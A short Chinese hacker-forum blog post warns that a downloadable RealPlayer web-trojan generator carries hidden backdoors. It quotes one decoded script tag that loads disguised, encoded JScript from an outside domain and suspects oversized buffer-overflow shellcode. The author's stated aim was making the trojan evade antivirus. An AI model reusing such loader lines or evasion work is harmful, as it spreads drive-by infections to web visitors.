H4x0r's Blog

作者：饿狼 来源：深色联盟QQ群
今天下载了个Realplayer牛X版网页木马生成器,打算做免杀的.

然后,发现index.htm的源代码很奇怪,好象是加密了,最下方调用了ENCODE过的JS文件.

http://www.wocao.net/js/wocao.ocx这个就是改了扩展名的JS文件,一样可以用.

然后我就下载了wocao.ocx文件,解了密,还是看不懂是什么意思.

过了一会,发现http://www.wocao.net/js/wocao.ocx这个地址打不开了。很奇怪.

并且http://www.wocao.net/js/这个目录也不存在,而且需要密码.

我判断,一定是www.wocao.net这个域名更新了指向的IP.指到一个普通的虚拟主机服务器上了.

当我把INDEX.HTM解密后,发现最下方有这么一段代码:

<script src=\"http://www.wocao.net/js/wocao2.ocx\" language=\"JScript.Encode\"></script>

大家注意,这里的地址http://www.wocao.net/js/wocao2.ocx和http://www.wocao.net/js/wocao.ocx这个地址很像,但不一样的。很明显,为了迷惑大家!!!~

我正准备看http://www.wocao.net/js/wocao2.ocx的内容时,才发现,www.wocao.net已经把域名指向给换了。.

日 !!

那个wocao2.ocx代码里一定加载了木马!!!!

还有,music.smi文件的SHELLCODE也有问题。本来是256个字节长度就可以触发缓冲区溢出漏洞的，结果他却把SHELLCODE弄得好大,有1.3几KB!!!!

知道这意味着什么么?很有可能在SHELLCODE里加了另一段后门代码!!

另外,根据作者BLOG上的留言评论来看,这个网马是加了后门的。口碑不好,请大家不要使用!!!

网页木马本身的逻辑也有问题。

当我把index.htm解密后,发现,INDEX.HTM根本就没调用到MUSIC.HTM文件,可生成器却说要调用,日!!!骗局!!!

不知道他搞什么名堂...

总之,一句话,这款网页木马就是垃圾,有不止一个后门!!!!请大家鄙视!!!

谢谢大家!!这是我忙了一个晚上的成果,谢谢!!